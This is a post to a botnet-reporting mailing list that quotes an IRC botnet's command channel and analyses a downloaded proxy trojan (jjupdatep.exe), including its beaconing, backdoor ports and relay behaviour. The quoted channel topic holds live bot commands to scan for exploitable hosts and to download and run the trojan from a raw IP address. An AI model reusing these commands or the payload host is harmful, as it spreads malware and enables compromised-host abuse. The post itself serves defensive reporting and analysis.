To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ---------- > :irc.fuck.com 332 [00|CZE|823714] #bart# :?asc -S -s|?else status > scan ?asc asn 150 5 0 _b _r _e _h|?ge.down http://207.226.22.141/ > jjupdatep.exe c:\iexplorer.exe 1
jjupdatep.exe is Proxy.Ranky.Gen.32. It connects to some hardcoded domains on port 53 and sends an initialisation string (16 bytes, I have no idea about the meaning) on port 53. Then a backdoor is opened, according to norman.com on port 42142, according to my investigation on port 36334. now its beeing contacted by several hosts on this backdoor port and receives a 9 byte string that contains 04 01 00 port ww.xx.yy.zz 00. Immediately it tries to connect on the provided port. In my investigation it tried to open connections on port 25... cheers andrej _______________________________________________ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
